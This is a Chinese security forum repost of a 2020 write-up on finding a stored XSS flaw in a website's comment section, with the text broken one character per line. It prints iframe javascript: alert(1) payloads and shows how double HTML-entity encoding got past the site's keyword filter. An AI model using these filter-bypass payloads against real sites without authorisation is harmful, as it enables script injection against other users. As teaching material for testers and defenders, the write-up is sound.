论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
漏洞
[28345] 2020-06-11_有趣的xss漏洞挖掘
文档创建者:
s7ckTeam
浏览次数:
2
最后更新:
2025-01-19
漏洞
2 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-58
6万
主题
-6万
回帖
-58
积分
管理员
积分
-58
发消息
2020-06-11_有趣的xss漏洞挖掘
有
趣
的
x
s
s
漏
洞
挖
掘
G
0
b
l
i
n
O
t
s
安
全
2
0
2
0
-
0
6
-
1
1
背
景
背
景
显
示
从
一
个
大
佬
那
听
说
一
个
网
站
的
评
论
区
可
能
存
在
x
s
s
漏
洞
,
作
为
一
个
挖
洞
界
的
小
萌
新
肯
定
兴
奋
呀
,
然
后
.
.
.
.
开
始
测
试
开
始
测
试
本
着
小
萌
新
的
执
着
,
开
始
了
各
种
的
绕
过
尝
试
,
然
后
你
就
发
现
了
大
佬
的
世
界
不
是
我
可
以
想
象
的
。
本
来
我
就
是
想
练
习
自
己
的
挖
洞
经
验
,
所
以
就
尝
试
了
很
多
次
很
多
次
。
然
后
我
就
在
c
h
e
a
t
-
s
h
e
e
t
中
看
到
了
这
个
。
这
个
是
使
用
了
U
R
L
编
码
和
H
T
M
L
编
码
,
解
码
后
得
到
是
<
i
f
r
a
m
e
s
r
c
=
"
j
a
v
a
s
c
r
i
p
t
:
'
%
3
C
s
c
r
i
p
t
%
3
E
a
l
e
r
t
(
1
)
%
3
C
%
2
F
s
c
r
i
p
t
%
3
E
'
"
>
<
/
i
f
r
a
m
e
>
-
-
>
<
i
f
r
a
m
e
s
r
c
=
"
j
a
v
a
s
c
r
i
p
t
:
'
<
s
c
r
i
p
t
>
a
l
e
r
t
(
1
)
<
/
s
c
r
i
p
t
>
'
"
>
<
/
i
f
r
a
m
e
>
然
后
我
就
直
接
拿
编
码
后
的
p
a
y
l
o
a
d
去
尝
试
。
然
后
得
到
了
如
下
结
果
对
,
我
可
以
确
定
了
是
不
过
滤
i
f
r
a
m
e
标
签
的
,
这
给
了
我
希
望
和
继
续
下
去
的
动
力
。
但
是
,
查
看
F
1
2
查
看
源
码
后
,
我
们
发
现
j
a
v
a
s
c
r
i
p
t
和
s
c
r
i
p
t
都
被
过
滤
了
。
尝
试
绕
过
尝
试
绕
过
J
a
v
a
S
c
r
i
p
t
过
滤
过
滤
我
知
道
J
a
v
a
S
c
r
i
p
t
是
支
持
H
T
M
L
编
码
的
。
而
且
在
中
H
T
M
L
编
码
可
以
不
用
带
所
以
我
们
尝
试
对
中
的
和
进
行
了
H
T
M
L
1
6
编
码
。
然
后
我
们
得
到
了
<
i
f
r
a
m
e
s
r
c
=
"
j
&
#
x
6
1
v
a
s
c
&
#
x
7
2
i
p
t
:
'
&
#
x
2
5
;
&
#
x
3
3
;
&
#
x
4
3
;
&
#
x
7
3
;
&
#
x
6
3
;
&
#
x
7
2
;
&
#
x
6
9
;
&
#
x
7
0
;
&
#
x
7
4
;
&
#
x
2
5
;
&
#
x
3
3
;
&
#
x
4
5
;
&
#
x
6
1
;
&
#
x
6
c
;
&
#
x
6
5
;
&
#
x
7
2
;
&
#
x
7
4
;
&
#
x
2
8
;
&
#
x
3
1
;
&
#
x
2
9
;
&
#
x
2
5
;
&
#
x
3
3
;
&
#
x
4
3
;
&
#
x
2
5
;
&
#
x
3
2
;
&
#
x
4
6
;
&
#
x
7
3
;
&
#
x
6
3
;
&
#
x
7
2
;
&
#
x
6
9
;
&
#
x
7
0
;
&
#
x
7
4
;
&
#
x
2
5
;
&
#
x
3
3
;
&
#
x
4
5
;
'
"
<
/
i
f
r
a
m
e
>
然
后
我
就
直
接
放
在
评
论
区
里
了
,
直
接
查
看
代
码
发
现
:
j
a
v
a
s
c
r
i
p
t
:
;
j
a
v
a
s
r
i
p
t
:
a
r
感
觉
自
己
绕
过
了
。
激
动
的
心
,
颤
抖
的
手
。
提
交
评
论
以
后
。
。
。
。
。
发
现
没
反
应
。
。
查
看
代
码
才
发
现
:
这
根
本
没
绕
过
。
思
考
后
的
觉
悟
思
考
后
的
觉
悟
我
发
现
把
用
H
T
M
L
1
6
编
码
后
的
p
a
y
l
o
a
d
和
最
开
始
的
p
a
y
l
o
a
d
得
到
的
结
果
一
模
一
样
。
然
后
我
就
再
次
把
最
开
始
的
p
a
y
l
o
a
d
重
新
放
到
评
论
区
然
后
不
提
交
,
查
看
源
码
。
我
发
现
在
提
交
之
前
p
a
y
l
o
a
d
已
被
H
T
M
L
解
码
一
次
。
我
觉
得
可
以
尝
试
二
次
H
T
M
L
编
码
。
然
后
我
就
把
s
r
c
的
值
都
重
新
进
行
一
次
H
T
M
L
编
码
。
我
可
以
得
到
<
i
f
r
a
m
e
s
r
c
=
"
&
#
x
6
a
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
6
;
&
#
x
3
1
;
&
#
x
7
6
;
&
#
x
6
1
;
&
#
x
7
3
;
&
#
x
6
3
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
7
;
&
#
x
3
2
;
&
#
x
6
9
;
&
#
x
7
0
;
&
#
x
7
4
;
&
#
x
3
a
;
&
#
x
2
7
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
2
;
&
#
x
3
5
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
3
;
&
#
x
3
3
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
4
;
&
#
x
3
3
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
7
;
&
#
x
3
3
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
6
;
&
#
x
3
3
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
7
;
&
#
x
3
2
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
6
;
&
#
x
3
9
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
7
;
&
#
x
3
0
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
7
;
&
#
x
3
4
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
2
;
&
#
x
3
5
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
3
;
&
#
x
3
3
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
4
;
&
#
x
3
5
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
6
;
&
#
x
3
1
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
6
;
&
#
x
6
3
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
6
;
&
#
x
3
5
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
7
;
&
#
x
3
2
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
7
;
&
#
x
3
4
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
2
;
&
#
x
3
8
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
3
;
&
#
x
3
1
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
2
;
&
#
x
3
9
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
2
;
&
#
x
3
5
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
3
;
&
#
x
3
3
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
4
;
&
#
x
3
3
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
2
;
&
#
x
3
5
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
3
;
&
#
x
3
2
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
4
;
&
#
x
3
6
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
7
;
&
#
x
3
3
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
6
;
&
#
x
3
3
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
7
;
&
#
x
3
2
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
6
;
&
#
x
3
9
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
7
;
&
#
x
3
0
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
7
;
&
#
x
3
4
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
2
;
&
#
x
3
5
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
3
;
&
#
x
3
3
;
&
#
x
3
b
;
&
#
x
2
6
;
&
#
x
2
3
;
&
#
x
7
8
;
&
#
x
3
4
;
&
#
x
3
5
;
&
#
x
3
b
;
&
#
x
2
7
;
"
<
/
i
f
r
a
m
e
>
在
提
交
之
前
,
我
们
可
以
看
到
:
j
a
v
a
s
c
r
i
p
t
:
提
交
之
后
:
发
现
成
功
绕
过
。
总
结
总
结
本
篇
没
有
太
多
技
术
含
量
,
挖
到
的
洞
还
靠
运
气
。
从
这
次
挖
洞
中
我
可
以
学
习
到
,
留
意
p
a
y
l
o
a
d
在
网
站
中
的
变
化
非
常
重
要
。
可
能
这
就
是
菜
鸟
的
我
只
会
抓
包
的
理
由
吧
。
阅
读
原
文
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
漏洞